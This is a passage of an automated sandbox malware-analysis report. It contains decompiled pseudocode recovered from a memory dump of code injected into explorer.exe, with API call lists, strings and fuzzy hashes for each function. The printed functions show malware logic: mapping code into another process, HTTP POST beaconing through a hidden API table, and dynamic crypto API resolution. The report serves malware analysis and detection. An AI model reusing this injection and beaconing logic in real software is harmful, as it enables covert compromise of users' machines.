        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
        										goto L38;
        									}
        									_t242 = E0008DA20( &_v80);
        									goto L32;
        								}
        								if(__eflags == 0) {
        									__eflags = _v72 - 0xffff;
        									_t298 = L"TRUE";
        									if(_v72 != 0xffff) {
        										_t298 = L"FALSE";
        									}
        									goto L31;
        								}
        								_t243 = _t218 - 1;
        								__eflags = _t243;
        								if(_t243 == 0) {
        									goto L38;
        								}
        								_t244 = _t243 - 1;
        								__eflags = _t244;
        								if(_t244 == 0) {
        									goto L35;
        								}
        								_t245 = _t244 - 1;
        								__eflags = _t245;
        								if(_t245 == 0) {
        									goto L35;
        								}
        								__eflags = _t245 != 5;
        								if(_t245 != 5) {
        									goto L28;
        								}
        								_t298 = _v72;
        								goto L31;
        							}
        							__imp__#16(_v24);
        							_t210 = _v28;
        							 *((intOrPtr*)( *_t210 + 8))(_t210);
        							_t252 = _v20;
        							L42:
        							_t262 = _v32;
        							_t252 = _t252 + 1;
        							_v20 = _t252;
        							__eflags = _t262;
        							if(_t262 != 0) {
        								continue;
        							}
        							L48:
        							_t324 = _v40;
        							goto L49;
        						}
        						_t247 = _v28;
        						 *((intOrPtr*)( *_t247 + 8))(_t247);
        						goto L42;
        					}
        					_t262 = _v32;
        					goto L48;
        				} else {
        					E0008861A( &_v36, _t322);
        					_t320 = _v36;
        					goto L53;
        				}
        			}

        APIs
          • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
          • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
          • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
          • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
          • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
        • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
        • SysFreeString.OLEAUT32(?), ref: 0008DF82
        • SysFreeString.OLEAUT32(?), ref: 0008DF8B
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 1290676130-1412513891
        • Opcode ID: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
        • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
        • Opcode Fuzzy Hash: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
        • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 59%
        			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
        				signed int _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				char _v24;
        				char _v28;
        				char _v32;
        				intOrPtr _v36;
        				struct HINSTANCE__* _v40;
        				char _v44;
        				char _v56;
        				char _v72;
        				struct _WNDCLASSEXA _v120;
        				intOrPtr _t69;
        				intOrPtr _t71;
        				intOrPtr _t75;
        				intOrPtr _t80;
        				intOrPtr _t92;
        				intOrPtr _t95;
        				intOrPtr _t96;
        				struct HWND__* _t106;
        				intOrPtr* _t113;
        				struct HINSTANCE__* _t116;
        				intOrPtr _t120;
        				intOrPtr _t126;
        				intOrPtr _t131;
        				intOrPtr _t134;
        				intOrPtr _t136;
        				intOrPtr _t139;
        				char _t140;
        				intOrPtr _t141;
        
        				_t69 =  *0x9e688; // 0xb0000
        				_t126 = __ecx;
        				_t134 = __edx;
        				_t116 = 0;
        				_v36 = __edx;
        				_v16 = 0;
        				_v44 = 0;
        				_v40 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				_v24 = 0;
        				_v20 = __ecx;
        				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
        					E0008E23E(0x1f4);
        					_t116 = 0;
        				}
        				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
        				_v28 = _t116;
        				if( *_t113 != 0x4550) {
        					L12:
        					if(_v8 != 0) {
        						_t75 =  *0x9e780; // 0x0
        						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
        						_v8 = _v8 & 0x00000000;
        					}
        					L14:
        					if(_v12 != 0) {
        						_t136 =  *0x9e780; // 0x0
        						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
        					}
        					if(_v16 != 0) {
        						_t71 =  *0x9e780; // 0x0
        						 *((intOrPtr*)(_t71 + 0x20))(_v16);
        					}
        					return _v8;
        				}
        				_push(_t116);
        				_push(0x8000000);
        				_v44 =  *((intOrPtr*)(_t113 + 0x50));
        				_push(0x40);
        				_push( &_v44);
        				_push(_t116);
        				_push(0xe);
        				_push( &_v16);
        				_t80 =  *0x9e780; // 0x0
        				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
        					goto L12;
        				}
        				_v120.style = 0xb;
        				_v120.cbSize = 0x30;
        				_v120.lpszClassName =  &_v56;
        				asm("movsd");
        				_v120.lpfnWndProc = DefWindowProcA;
        				asm("movsd");
        				asm("movsd");
        				asm("movsb");
        				asm("movsd");
        				asm("movsd");
        				asm("movsw");
        				asm("movsb");
        				_v120.cbWndExtra = 0;
        				_v120.lpszMenuName = 0;
        				_v120.cbClsExtra = 0;
        				_v120.hInstance = 0;
        				if(RegisterClassExA( &_v120) != 0) {
        					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
        					if(_t106 != 0) {
        						DestroyWindow(_t106);
        						UnregisterClassA( &_v56, 0);
        					}
        				}
        				_t139 =  *0x9e780; // 0x0
        				_push(0x40);
        				_push(0);
        				_push(2);
        				_push( &_v24);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push( &_v12);
        				_push(GetCurrentProcess());
        				_push(_v16);
        				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
        					_t126 = _v20;
        					goto L12;
        				} else {
        					_push(0x40);
        					_push(0);
        					_push(2);
        					_push( &_v24);
        					_push(0);
        					_push(0);
        					_push(0);
        					_t126 = _v20;
        					_push( &_v8);
        					_t92 =  *0x9e780; // 0x0
        					_push(_t126);
        					_push(_v16);
        					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
        						goto L12;
        					}
        					_t140 = E00088669( *0x9e688, 0x1ac4);
        					_v32 = _t140;
        					if(_t140 == 0) {
        						goto L12;
        					}
        					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
        					_t95 =  *0x9e684; // 0x133f8f0
        					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
        					_t120 =  *0x9e684; // 0x133f8f0
        					_t131 = _t96;
        					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
        					E0008861A( &_v32, 0x1ac4);
        					_t141 =  *0x9e688; // 0xb0000
        					 *0x9e688 = _t131;
        					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
        					E0008C63F(_v12, _v8, _v36);
        					 *0x9e688 = _t141;
        					goto L14;
        				}
        			}

        APIs
        • RegisterClassExA.USER32 ref: 0008C785
        • CreateWindowExA.USER32 ref: 0008C7B0
        • DestroyWindow.USER32 ref: 0008C7BB
        • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
        • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 3082384575-2319545179
        • Opcode ID: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
        • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
        • Opcode Fuzzy Hash: f1727252491e073bc0b48fd9dcaf6412e4aa2d6629060b779a89976dd17fed39
        • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
        				char _v8;
        				char _v16;
        				short _v144;
        				short _v664;
        				void* _t19;
        				struct HINSTANCE__* _t22;
        				long _t23;
        				long _t24;
        				char* _t27;
        				WCHAR* _t32;
        				long _t33;
        				intOrPtr _t37;
        				intOrPtr _t38;
        				void* _t49;
        				int _t53;
        				void* _t54;
        				intOrPtr* _t55;
        				void* _t57;
        
        				_t49 = __edx;
        				OutputDebugStringA("Hello qqq");
        				if(_a8 != 1) {
        					if(_a8 != 0) {
        						L12:
        						return 1;
        					}
        					SetLastError(0xaa);
        					L10:
        					return 0;
        				}
        				E000885EF();
        				_t19 = E0008980C( &_v16);
        				_t57 = _t49;
        				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
        					goto L12;
        				} else {
        					E00088F78();
        					GetModuleHandleA(0);
        					_t22 = _a4;
        					 *0x9e69c = _t22;
        					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
        					_t24 = GetLastError();
        					if(_t23 != 0 && _t24 != 0x7a) {
        						memset( &_v144, 0, 0x80);
        						_t55 = _t54 + 0xc;
        						_t53 = 0;
        						do {
        							_t27 = E000895C7(_t53);
        							_a8 = _t27;
        							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
        							E000885C2( &_a8);
        							_t53 = _t53 + 1;
        						} while (_t53 < 0x2710);
        						E00092A5B( *0x9e69c);
        						 *_t55 = 0x7c3;
        						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
        						 *_t55 = 0xb4e;
        						_t32 = E000895E1(0x9ba28);
        						_a8 = _t32;
        						_t33 = GetFileAttributesW(_t32);
        						_push( &_a8);
        						if(_t33 == 0xffffffff) {
        							E000885D5();
        							_v8 = 0;
        							_t37 =  *0x9e684; // 0x133f8f0
        							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
        							 *0x9e6a8 = _t38;
        							if(_t38 == 0) {
        								goto L10;
        							}
        							goto L12;
        						}
        						E000885D5();
        					}
        					goto L10;
        				}
        			}

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
        • SetLastError.KERNEL32(000000AA), ref: 000860D7
          • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
          • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
          • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
        • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
        • GetLastError.KERNEL32 ref: 00085FEF
        • memset.MSVCRT ref: 00086013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
        • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
        • String ID: Hello qqq
        • API String ID: 1203100507-3610097158
        • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
        • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
        • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
        • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
        				char _v8;
        				char _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				intOrPtr _v28;
        				char _v32;
        				intOrPtr _v36;
        				signed int _v40;
        				signed int _v44;
        				intOrPtr _v48;
        				intOrPtr _v52;
        				intOrPtr _v56;
        				intOrPtr _v60;
        				char _v64;
        				int _v76;
        				void* _v80;
        				intOrPtr _v100;
        				int _v104;
        				void* _v108;
        				intOrPtr _v112;
        				intOrPtr _v116;
        				char* _v120;
        				void _v124;
        				char _v140;
        				void _v396;
        				void _v652;
        				intOrPtr _t105;
        				intOrPtr _t113;
        				intOrPtr* _t115;
        				intOrPtr _t118;
        				intOrPtr _t121;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t131;
        				char _t133;
        				intOrPtr _t136;
        				char _t138;
        				char _t139;
        				intOrPtr _t141;
        				intOrPtr _t147;
        				intOrPtr _t154;
        				intOrPtr _t158;
        				intOrPtr _t162;
        				intOrPtr _t164;
        				intOrPtr _t166;
        				intOrPtr _t172;
        				intOrPtr _t176;
        				void* _t183;
        				void* _t185;
        				intOrPtr _t186;
        				char _t195;
        				intOrPtr _t203;
        				intOrPtr _t204;
        				signed int _t209;
        				void _t212;
        				intOrPtr _t213;
        				void* _t214;
        				intOrPtr _t216;
        				char _t217;
        				intOrPtr _t218;
        				signed int _t219;
        				signed int _t220;
        				void* _t221;
        
        				_v40 = _v40 & 0x00000000;
        				_v24 = 4;
        				_v36 = 1;
        				_t214 = __edx;
        				memset( &_v396, 0, 0x100);
        				memset( &_v652, 0, 0x100);
        				_v64 = E000895C7(0x85b);
        				_v60 = E000895C7(0xdc9);
        				_v56 = E000895C7(0x65d);
        				_v52 = E000895C7(0xdd3);
        				_t105 = E000895C7(0xb74);
        				_v44 = _v44 & 0;
        				_t212 = 0x3c;
        				_v48 = _t105;
        				memset( &_v124, 0, 0x100);
        				_v116 = 0x10;
        				_v120 =  &_v140;
        				_v124 = _t212;
        				_v108 =  &_v396;
        				_v104 = 0x100;
        				_v80 =  &_v652;
        				_push( &_v124);
        				_push(0);
        				_v76 = 0x100;
        				_push(E0008C379(_t214));
        				_t113 =  *0x9e6a4; // 0x1430938
        				_push(_t214);
        				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
        					_t209 = 0;
        					_v20 = 0;
        					do {
        						_t115 =  *0x9e6a4; // 0x1430938
        						_v12 = 0x8404f700;
        						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
        						if(_t213 != 0) {
        							_t195 = 3;
        							_t185 = 4;
        							_v8 = _t195;
        							_t118 =  *0x9e6a4; // 0x1430938
        							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
        							_v8 = 0x3a98;
        							_t121 =  *0x9e6a4; // 0x1430938
        							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t124 =  *0x9e6a4; // 0x1430938
        							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t127 =  *0x9e6a4; // 0x1430938
        							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
        							_t131 =  *0x9e6a4; // 0x1430938
        							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
        							if(_a24 != 0) {
        								E0008980C(_a24);
        							}
        							if(_t186 != 0) {
        								_t133 = 0x8484f700;
        								if(_v112 != 4) {
        									_t133 = _v12;
        								}
        								_t136 =  *0x9e6a4; // 0x1430938
        								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
        								_v8 = _t216;
        								if(_a24 != 0) {
        									E0008980C(_a24);
        								}
        								if(_t216 != 0) {
        									_t138 = 4;
        									if(_v112 != _t138) {
        										L19:
        										_t139 = E000895C7(0x777);
        										_t217 = _t139;
        										_v12 = _t217;
        										_t141 =  *0x9e6a4; // 0x1430938
        										_t218 = _v8;
        										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
        										E000885C2( &_v12);
        										if(_a24 != 0) {
        											E0008980C(_a24);
        										}
        										if(_v28 != 0) {
        											L28:
        											_v24 = 8;
        											_push(0);
        											_v32 = 0;
        											_v28 = 0;
        											_push( &_v24);
        											_push( &_v32);
        											_t147 =  *0x9e6a4; // 0x1430938
        											_push(0x13);
        											_push(_t218);
        											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
        												_t219 = E00089749( &_v32);
        												if(_t219 == 0xc8) {
        													 *_a20 = _v8;
        													 *_a12 = _t213;
        													 *_a16 = _t186;
        													return 0;
        												}
        												_t220 =  ~_t219;
        												L32:
        												_t154 =  *0x9e6a4; // 0x1430938
        												 *((intOrPtr*)(_t154 + 8))(_v8);
        												L33:
        												if(_t186 != 0) {
        													_t158 =  *0x9e6a4; // 0x1430938
        													 *((intOrPtr*)(_t158 + 8))(_t186);
        												}
        												if(_t213 != 0) {
        													_t203 =  *0x9e6a4; // 0x1430938
        													 *((intOrPtr*)(_t203 + 8))(_t213);
        												}
        												return _t220;
        											}
        											GetLastError();
        											_t220 = 0xfffffff8;
        											goto L32;
        										} else {
        											GetLastError();
        											_t162 =  *0x9e6a4; // 0x1430938
        											 *((intOrPtr*)(_t162 + 8))(_t218);
        											_t218 = 0;
        											goto L23;
        										}
        									}
        									_v12 = _t138;
        									_push( &_v12);
        									_push( &_v16);
        									_t172 =  *0x9e6a4; // 0x1430938
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
        										L18:
        										GetLastError();
        										goto L19;
        									}
        									_v16 = _v16 | 0x00003380;
        									_push(4);
        									_push( &_v16);
        									_t176 =  *0x9e6a4; // 0x1430938
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
        										goto L19;
        									}
        									goto L18;
        								} else {
        									GetLastError();
        									L23:
        									_t164 =  *0x9e6a4; // 0x1430938
        									 *((intOrPtr*)(_t164 + 8))(_t186);
        									_t186 = 0;
        									goto L24;
        								}
        							} else {
        								GetLastError();
        								L24:
        								_t166 =  *0x9e6a4; // 0x1430938
        								 *((intOrPtr*)(_t166 + 8))(_t213);
        								_t213 = 0;
        								goto L25;
        							}
        						}
        						GetLastError();
        						L25:
        						_t204 = _t218;
        						_t209 = _v20 + 1;
        						_v20 = _t209;
        					} while (_t209 < 2);
        					_v8 = _t218;
        					if(_t204 != 0) {
        						goto L28;
        					}
        					_t220 = 0xfffffffe;
        					goto L33;
        				}
        				_t183 = 0xfffffffc;
        				return _t183;
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
        • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
        • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
        • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 28%
        			E000916B8(signed int* _a4) {
        				char _v8;
        				_Unknown_base(*)()* _v12;
        				_Unknown_base(*)()* _v16;
        				char _v20;
        				_Unknown_base(*)()* _t16;
        				_Unknown_base(*)()* _t17;
        				void* _t22;
        				intOrPtr* _t28;
        				signed int _t29;
        				signed int _t30;
        				struct HINSTANCE__* _t32;
        				void* _t34;
        
        				_t30 = 0;
        				_v8 = 0;
        				_t32 = GetModuleHandleA("advapi32.dll");
        				if(_t32 == 0) {
        					L9:
        					return 1;
        				}
        				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
        				_v12 = _t16;
        				if(_t16 == 0) {
        					goto L9;
        				}
        				_t17 = GetProcAddress(_t32, "CryptGenRandom");
        				_v16 = _t17;
        				if(_t17 == 0) {
        					goto L9;
        				}
        				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
        				if(_t28 == 0) {
        					goto L9;
        				}
        				_push(0xf0000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push( &_v8);
        				if(_v12() == 0) {
        					goto L9;
        				}
        				_t22 = _v16(_v8, 4,  &_v20);
        				 *_t28(_v8, 0);
        				if(_t22 == 0) {
        					goto L9;
        				}
        				_t29 = 0;
        				do {
        					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
        					_t29 = _t29 + 1;
        				} while (_t29 < 4);
        				 *_a4 = _t30;
        				return 0;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
        • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
        • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
        • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
        				signed int _t12;
        				signed int _t13;
        				int _t15;
        				char* _t24;
        				char* _t26;
        				char* _t28;
        				char* _t29;
        				signed int _t40;
        				char* _t43;
        				char* _t45;
        				long long* _t47;
        
        				_t12 = _a20;
        				if(_t12 == 0) {
        					_t12 = 0x11;
        				}
        				_t26 = _a4;
        				_push(_t30);
        				 *_t47 = _a12;
        				_push(_t12);
        				_push("%.*g");
        				_push(_a8);
        				_push(_t26);
        				L00092285();
        				_t40 = _t12;
        				if(_t40 < 0 || _t40 >= _a8) {
        					L19:
        					_t13 = _t12 | 0xffffffff;
        					goto L20;
        				} else {
        					L000922CD();
        					_t15 =  *((intOrPtr*)( *_t12));
        					if(_t15 != 0x2e) {
        						_t24 = strchr(_t26, _t15);
        						if(_t24 != 0) {
        							 *_t24 = 0x2e;
        						}
        					}
        					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
        						L11:
        						_t43 = strchr(_t26, 0x65);
        						_t28 = _t43;
        						if(_t43 == 0) {
        							L18:
        							_t13 = _t40;
        							L20:
        							return _t13;
        						}
        						_t45 = _t43 + 1;
        						_t29 = _t28 + 2;
        						if( *_t45 == 0x2d) {
        							_t45 = _t29;
        						}
        						while( *_t29 == 0x30) {
        							_t29 = _t29 + 1;
        						}
        						if(_t29 != _t45) {
        							E00088706(_t45, _t29, _t40 - _t29 + _a4);
        							_t40 = _t40 + _t45 - _t29;
        						}
        						goto L18;
        					} else {
        						_t6 = _t40 + 3; // 0x909b2
        						_t12 = _t6;
        						if(_t12 >= _a8) {
        							goto L19;
        						}
        						_t26[_t40] = 0x302e;
        						( &(_t26[2]))[_t40] = 0;
        						_t40 = _t40 + 2;
        						goto L11;
        					}
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
        • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
        • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
        • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
        • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
        • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
        • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
        • SysAllocString.OLEAUT32(?), ref: 0008D764
        • SysAllocString.OLEAUT32(00000000), ref: 0008D778
        • SysFreeString.OLEAUT32(?), ref: 0008D7F3
        • SysFreeString.OLEAUT32(?), ref: 0008D7F6
        • SysFreeString.OLEAUT32(?), ref: 0008D7FB
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree
        • String ID:
        • API String ID: 344208780-0
        • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
        • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
        • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
        • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID: @$\u%04X$\u%04X\u%04X
        • API String ID: 0-2132903582
        • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
        • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
        • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
        • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 30%
        			E0008D523(void* __ecx) {
        				char _v8;
        				void* _v12;
        				char* _t15;
        				intOrPtr* _t16;
        				void* _t21;
        				intOrPtr* _t23;
        				intOrPtr* _t24;
        				intOrPtr* _t25;
